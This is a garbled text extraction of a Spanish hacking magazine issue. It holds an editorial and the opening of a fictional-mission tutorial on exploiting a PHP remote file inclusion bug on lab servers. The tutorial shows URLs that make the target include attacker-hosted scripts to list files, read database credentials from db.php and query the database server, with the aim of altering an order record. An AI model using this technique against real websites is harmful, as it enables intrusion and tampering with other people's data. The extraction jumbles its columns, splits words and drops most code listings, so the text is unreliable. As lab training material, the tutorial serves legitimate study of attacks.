revista hack x crack 28

Upload: juan-pedro-reyes-sandoval

Post on 17-Jul-2015

127 views

Category:

Documents


0 download

DESCRIPTION

DESPEGA LA SEGUNDA ETAPA DEL PROYECTO HXC.

TRANSCRIPT

00028

8 414090 202756

EDIT ORIALDESPEGA LA SEGUNDA ETAPA DEL PROYECTO HXC. MUCHOS CAMBIOS Y UNA AMENAZA: LA LEY MORDAZAEstimados amigos de Hack x Crack, esta es la segunda vez que tengo el placer de escribir esta editorial. Tienes ante ti el nmero 28 de PC PASO A PASO // Los Cuadernos de hackxcrack, el segundo nmero de la nueva etapa de esta revista. En la anterior editorial te anuncibamos que toda una serie de cambios estaban en camino, pues bien, muchos de esos cambios ya son perfectamente visibles y otros muchos estn en el punto de mira. El primer cambio, el ms importante, el motor, el que ha permitido que este nmero est en tus manos y contenga importantes mejoras es un cambio que no "se ve", es la apertura del proyecto HXC. Esta publicacin ya no es responsabilidad de un director y unos pocos colaboradores directos, el proyecto HXC se ha abierto y ahora somos muchas las personas que estamos colaborando, aportando nuestros conocimientos (cuanto creemos saber), nuestro talento (si es que tenemos alguno), nuestro tiempo (muchas horas robadas al sueo) y, en definitiva, empujando cuanto podemos y utilizando todos los recursos que hay a nuestro alcance. El segundo cambio, la cabecera de La Portada (cambio de "logo"), portada en s misma y reestructuracin completa de la maquetacin interna. Hace mucho tiempo que tenamos pendiente mejorar el aspecto de la revista, por fin, gracias al talento, a las aportaciones y al trabajo de muchas personas, aqu est el primer resultado. Seguiremos avanzando en este campo, intentaremos mejorar en cada nuevo nmero. El tercer cambio, reactivacin los servidores de pruebas (servidores de hack) para que puedas hacer las prcticas propuestas en la revista sin temor a incumplir la Ley. Este punto ha sido una cruz para esta revista, en su da se montaron los servidores PERO estaban ms tiempo fuera de servicio que ON LINE. Bien, hemos trabajado mucho para encontrar una solucin factible y finalmente creemos haberla encontrado. En este nmero hemos habilitado 4 servidores (dos escenarios completos) para que puedas completar la prctica propuesta en el primer artculo: HACKING ESTRATEGIA. Visita nuestro foro y en concreto el enlace http://www.hackxcrack.com/phpBB2/viewtopic.php?t=23301 En este enlace tienes toda la informacin necesaria sobre los Servidores de Hack del Proyecto HXC. El cuarto cambio y caminando en la direccin de hacer HXC lo ms abierto posible, se ha "construido" en el foro (www.hackxcrack.com) una "Sala de Votaciones" donde ya se ha propuesto y resuelto la primera votacin: la portada de este nmero 28 NO fue decidida por ningn director, fue decidida por todos los integrantes del foro. No te pierdas la oportunidad de votar y decidir sobre la revista, regstrate en el foro y utiliza tu voto para que HXC llegue a ser como t deseas. Muchos cambios, si, muchos avances, si, muchas cosas buenas, si pero todava hay muchos temas pendientes en los que ya estamos trabajando y que esperamos presentarte para el prximo nmero, estamos poniendo todo nuestro empeo. Trabajaremos en la Web, en la organizacin interna, en la atencin telefnica, en los pedidos, en la publicidad (imprescindible si queremos aumentar las pginas de la revista) y, entre otras cosas, crear un sistema de Bandeja de Entrada compartida desde donde podremos responder TODOS los mails que nos lleguen no te lo crees?... tiempo al tiempo, ahora tenemos "el poder" que ofrece el trabajo en grupo. Si conseguimos organizarnos bien, todo eso y mucho ms ser posible ;) Hay mucho por hacer, mucho!!! Pero con la ayuda del grupo que estamos formando, parte de cuyo esfuerzo ya puedes ver reflejado en este nmero, iremos consiguiendo cada una de las metas. Y recuerda algo muy importante nosotros sin ti, NO SOMOS NADA!!! Un fuerte abrazo a todos!AZIMUT, administrador de los foros de hackxcrack (www.hackxcrack.com).

P.D: Los artculos publicados este mes han precisado de consulta/asesoramiento externo debido a que una nueva ley intenta silenciarnos (silenciarnos a nosotros, a ti y a cualquier medio de comunicacin). La llamada LEY MORDAZA es un atentado contra la libertad de expresin que puede provocar condenas de crcel en Espaa por el mero hecho de IMFORMAR. Al final de la revista tienes la explicacin a esta posdata en forma de artculo de opinin.

1.2.3.10.15.34.42.43.52.61.62.66.67.68.-

PORTADA EDITORIAL - INDICE - DATOS HACKING ESTRATEGIA CURSO DE PYTHON PONIENDO A PRUEBA EL ANTIVIRUS EXPLOTANDO HEAP/BBS OVERFLOWS QUIERES ESCRIBIR PARA ESTA REVISTA? CURSO DE C TALLER DE CRIPTOGRAFIA VISITA NUESTRO FORO LA LEY MORDAZA: INFORMAR ES DELITO ATENCION AL CLIENTE PON PUBLICIDAD EN LA REVISTA POR 99 EUROS PIDE LOS NUMEROS ATRADOS

taca dissenys [email protected]

grupo HXC juanmat

EDITOTRANS S.L. B43675701 PERE MARTELL N 20, 2 - 1 43001 TARRAGONA (ESPAA)Director Editorial I. SENTIS E-mail contacto [email protected] Ttulo de la publicacin Los Cuadernos de HACK X CRACK. Nombre Comercial de la publicacn PC PASO A PASO Web: www.hackxcrack.com IMPRIME: I.G. PRINTONE S.A. Tel 91 808 50 15 DISTRIBUCIN: SGEL, Avda. Valdeparra 29 (Pol. Ind.) 28018 ALCOBENDAS (MADRID) Tel 91 657 69 00 FAX 91 657 69 28 WEB: www.sgel.es

Moleman, a.k.a Hctor M. ---> [email protected] Ramiro C.G. (alias Death Master) // Alex F. (CrashCool)

Copyright Editotrans S.L. NUMERO 28 -- PRINTED IN SPAIN PERIOCIDAD MENSUAL Deposito legal: B.26805-2002 Cdigo EAN: 8414090202756

Bienvenidos a esta serie de artculos en los que aprenderemos diversas tcnicas de intrusin usadas en la realidad bajo un marco de suspense y con una trama y escenarios ficticios que te situarn junto al atacante, nos convertiremos en agentes especiales y se nos entregar una misin que deberemos llevarla al xito. Soy CrashCool y os doy la bienvenida a hacking de estrategia. ;)

Documento de la misin: Necesitamos que altere la base de datos de WADAL SL y modifique la direccin de entrega de un pedido que sospe chamos es ilegal, deber modificar el lugar de entrega para que podamos tenderle all una trampa y capturar a Wadalberto, jefe de WADAL SL y principal sospechoso A continuacin le doy los datos tcnicos que nuestros agentes han conseguido: Tanto el sistema de pedidos como la Web de la compaa comparten el mismo servidor de bases de datos, solo es posible acceder a dicho servidor desde las propias oficinas de la empresa o desde el servidor Web donde se aloja la pgina de la empresa, ambos servidores corren Linux como sistema operativo. El pedido se entregar el da 12/05/05,el lugar y hora de entrega es desconocido y deber averiguarlo, segui damente deber modificarlo siendo el nuevo destino: C\Secreta N 99 Wadalbertia La Web de WADAL SL se encuentra en http://172.16.1.2 Mucha suerte en su misin

1- Trazando el esquema de ataqueTenemos que infiltrarnos en el servidor de bases de datos, la nica manera de hacerlo es desde el servidor Web o desde las oficinas de WADAL SL. Deslizarnos desde un helicptero por la rejilla de ventilacin del edificio de WADAL.SL para acceder a las ofi cinas y procurar que no se nos caiga la gota de sudor al

suelo, se lo dejaremos a Tom Cruise, nosotros vamos a in tentar infiltrarnos en la base de datos desde el servidor Web. El escenario se nos presenta as: (ver imagen 1) Lo que haremos ser lo siguiente: Nos infiltraremos en el servidor Web A travs de ah conectaremos con el servidor BBDD

3

mos resultados, auditaremos cada uno de los servicios que corra el servidor. Vistamos la Web para comenzar la audi toria de la aplicacin. http://172.16.1.2 (ver imagen 2) Visitamos las distintas secciones de la Web y nos fijamos en el enlace de cada seccin: http://172.16.1.2/index.php?seccion=i nicio.html http://172.16.1.2/index.php?seccion= empresa.html http://172.16.1.2/index.php?seccion= procuctos.html http://172.16.1.2/index.php?seccion= contacto.html

Imagen 1Esto nos hace sospechar que nos en contramos ante un peligroso error de programacin, ms conocido como re mote file inclusin , la base de este bug es la inclusin de un archivo en el cdigo de la Web, el cual se ejecutar en el propio servidor. Podemos deducir que en el cdigo de index.php encontraremos en alguna parte algo parecido a esto:

Como podemos ver seccion es una va riable que se recoge con GET y se inclu ye el nombre del archivo que contenga. As pues, esto: http://172.16.1.2/index.php?seccion= empresa.html equivaldra a:

Imagen 2Visualizaremos las bases de da tos alojadas para seleccionar la que nos resulte sospechosa de ser la encargada de alojar los pe didos. Visualizaremos las tablas de esa base de datos y haremos una consulta a dicha tabla para visua lizar su contenido Alteraremos la tabla y finaliza remos el ataque.

2- Preparando el ataqueLo primero que haremos ser una audito ria al servidor, para ello primero auditare mos la aplicacin Web y si no consegui

La sentencia include de PHP permite por defecto incluir archivos remotos, si montramos un servidor Web en nues tro PC http://172.16.1.45 y guardra mos empresa.html en el directorio raz de nuestro servidor, al acceder a: http://172.16.1.2/index.php?seccion= http://172.16.1.45/empresa.html no

4

notaramos diferencia alguna que acce der por http://172.16.1.2/index.php? seccion=empresa.html , pero si vamos ms all, Qu pasara si creamos un script en PHP? el cdigo que programe mos se ejecutara en el servidor Web.

2.1 Diseando los scripts para la misinUna vez que podemos ejecutar cdigo arbitrario dentro del servidor, tenemos acceso a l, y por tanto al servidor BBDD. Sabemos que la Web comparte el mis mo servidor de bases de datos que con tiene el pedido que tenemos que modifi car, por tanto en algn lugar la aplicacin Web conectar con dicho servidor BBDD y por tanto tendr los datos de acceso , es decir el nombre de usuario, contrasea e IP del servidor BBDD. Para localizar dichos datos tendremos que navegar tanto por el directorio de la Web, como tener la posibilidad de ver el fuente de los archivos contenidos en l. La forma de acceso que tenemos es por medio del bug de RFI (Remote File Inclusin) as que la forma de realizar dichas acciones ser mediante la programacin y posterior inclusin de scripts en PHP. Necesitamos pues: Script que nos liste los archivos del directorio Web Script que nos muestre el con tenido de un archivo Para esta labor explicar 2 posibilida des, hacer uso de funciones propias de PHP para dicho fin o bien utilizar funcio nes de ejecucin de comandos , que sera algo as como utilizar la funcin system de C; que nos permitira ejecu tar comandos como los que ejecutara mos en una shell de dicho servidor, con los permisos claro est de los que cons te el usuario bajo el que corriera el ser vidor Web.

Imagen 3

Imagen 4cficamente deshabilitadas; o bien las inhabilitarn indirectamente configurado PHP en modo seguro. El uso de alguna de estas funciones pa ra nuestra misin nos solucionara los dos scripts que tenemos que progra mar: Para el listado de archivos:

y lo usaramos : shell.php?comando= [aqu el comando]

2.1.2 Usando funciones de phpCon esta tcnica nos saltaremos las res tricciones que supone el uso de funcio nes de ejecucin de comandos y podre mos continuar la misin an con PHP en modo seguro. Script que muestra el listado de un di rectorio:

o siendo ms prcticos:

echo "$archivo
"; closedir($directorio); ?>

2.1.1 Usando funciones de ejecucin de comandosEl problema de estas funciones es que al ser bastante peligrosas para la segu ridad de un servidor, por regla general en una proteccin decente, estn espe

El script abre el directorio actual, lee cada archivo que se encuentre en l y lo muestra por pantalla.

NotaPara configurarlo en modo seguro editaremos php.ini y mo dificaremos el valor de safe_mode: ; Safe Mode ; safe_mode = On

NotaUn curso de programacin PHP se escapa del mbito del ar tculo; podrs encontrar uno en revistas anteriores, o bien hacer uso del buen amigo Google para profundizar ms en este fantstico lenguaje.

5

http://172.16.1.2/index.php?seccion= http://172.16.1.45/dir.php Obtendramos como salida el listado del directorio de nuestro servidor, ya que el servidor de WADAL SL hara la peticin de dir.php a nuestro servidor y ste al tener una extensin ejecutable por el servidor entregara la salida del script, o sea el listado de nuestro directorio. Elegimos como extensin, por ejemplo dir.inc y cat.inc , seguidamente lo eje cutamos obteniendo el listado del di rectorio de la Web de WADAL SL http://172.16.1.2/index.php?seccion= http://172.16.1.45/dir.inc (ver imagen 3) Sabemos que desde index.php se tiene acceso a la base de datos, por lo que o bien los datos de acceso se encuentran en index.php o bien en algn archivo secundario. Viendo los archivos, nos lla ma la atencin db.php , veamos su con tenido haciendo uso de cat.php http://172.16.1.2/index.php?seccion= http://172.16.1.45/cat.inc&archivo=db .php (ver imagen 4) El contenido del archivo db.php es el buscado ;) Ya estamos en disposicin de adentrar nos en el servidor BBDD.

Listado 1

Imagen 5

3.1 Infiltrndonos en el servidor bbddSera muy sencillo introducir esos datos en nuestro phpMyAdmin y gestionar di rectamente la base de datos desde nuestro PC, pero tenemos constancia de que el servidor de base de datos solo puede hablar con el servidor Web y con las oficinas de WADAL SL, as que tendremos que continuar desarrollando la misin a travs del pequeo gran bug de inclusin.

Listado 2Script que muestra el contenido de un archivo:

en el directorio raz los archivos dir.php y cat.php , usaremos stos en lugar de shell.php por motivos explicados ante riormente. Lo primero que haremos ser renom brar estos archivos a una extensin in ventada, que nuestro servidor Apache no sea capaz de reconocer, para qu? si incluyramos los archivos en el servi dor de WADAL SL tal que as:

3.1.1 Visualizando las bases de da tos del servidor bbddAhora programaremos un script que vi sualizar las bases de datos del servi

3 Iniciando el ataqueEn nuestro PC arrancamos el Apache (o cualquier otro servidor Web) y situamos

NotaEn los siguientes puntos 'hablaremos' con el servidor BBDD a tra vs de consultas SQL, podrs encontrar un curso excelente en http://www.hackxcrack.com/phpBB2/viewtopic.php?t=12222

6

dor, para ello tendremos que conectar con el servidor y ejecutar la consulta SQL SHOW DATABASES(ver listado1) Ahora incluiremos este script en el ser vidor de WADAL SL previo cambio de extensin.http://172.16.1.2/index.php?seccion=htt p://172.16.1.45/dbs.inc

(ver imagen 5) Excelente, hemos obtenido las bases de datos que alberga el servidor BBDD: gestion_administrativa, ges tion_empleados, gestion_pedidos, web_empresa Las 3 primeras podran ser pertenecien tes a la empresa y la ltima pertene ciente a la Web, as pues la informacin que nos daban en la misin era cierta y probablemente la base de datos que al berga los pedidos es la tercera (ges tion_pedidos)

Imagen 6

Listado 3

3.1.2 Visualizando las tablas de la base de datos gestion_pedidosPara ello procederemos de igual forma, ejecutando la sentencia SQL SHOW TABLES (ver listado2) Ahora incluiremos este script en el ser vidor de WADAL SL previo cambio de extensin. http://172.16.1.2/index.php?seccion= http://172.16.1.45/tablas.inc (ver imagen 6) Las tablas que contiene la base de datos gestion_pedidos son: pedidos_rechazados, pedi dos_pendientes, historial_pedidos Llegados a este punto de intrusin esta mos a un paso de completar con xito la misin, hemos localizado la tabla que contiene los pedidos pendientes, tan so lo nos queda ver la estructura de dicha tabla, visualizar y modificar el pedido.

Imagen 7

3.1.3 Visualizando la estructura de la tabla pedidos_pendientes

Imagen 8

Esto se consigue ejecutando la sentencia SQL DESCRIBE

7